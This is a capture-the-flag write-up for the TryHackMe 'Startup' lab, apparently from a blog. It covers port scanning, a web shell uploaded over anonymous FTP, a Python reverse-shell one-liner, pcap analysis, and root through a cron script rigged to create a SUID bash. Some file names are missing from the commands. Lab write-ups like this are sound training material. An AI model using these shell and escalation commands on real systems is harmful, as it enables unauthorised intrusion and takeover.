

This is a write-up for Try Hack Me's room named Startup.
This can be found here:-

Initial Access
# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p-

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p21,22,80

FTP anonymous
Write access in ftp folder
Uploaded php web shell from
Execute this to get reverse shell
    - python -c 'import  socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'
Upgrade Shell
    - python -c "import pty;pty.spawn('/bin/bash')"

What is the secret spicy soup recipe?
$ cat /recipe.txt
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was ****.

Navigate through the file system
Found /incidents/suspicious.pcapng
Ran a python webserver to get the packet capture on to the attacking machine:
- python -m SimpleHTTPServer 8080
Ran this command to get the file:
- wget

Analyze the file with WireShark and you will see:

Let's try the password found above for user lennie, do su lennie and then password.
Success and we get the user.txt at /home/lennie

In user lennie home directory check the folder named scripts
lennie@startup:~/scripts$ ls -lrt
ls -lrt
total 8
-rwxr-xr-x 1 root root 77 Nov 12 04:53
-rw-r--r-- 1 root root 1 Nov 19 18:54 startup_list.txt

The looks like script run via cronjob
lennie@startup:~/scripts$ cat
echo $LIST > /home/lennie/scripts/startup_list.txt

as we can see /home/lennie/scripts/startup_list.txt file being update every minute.

Also /etc/ is owned by user lennie

Add the following to /etc/
lennie@startup:~/scripts$ echo "cp /bin/bash /tmp; chmod +s /tmp/bash" >> /etc/

and after 1 minute we will get this in /tmp
-rwsr-sr-x 1 root root 1037528 Nov 19 19:03 bash

Now run this bash to get root and root flag at /root/root.txt
/tmp/bash -p

This room was easy, but exposes us to wire shark analysis and a technique to do privilege escalation.


Post a Comment

Popular Posts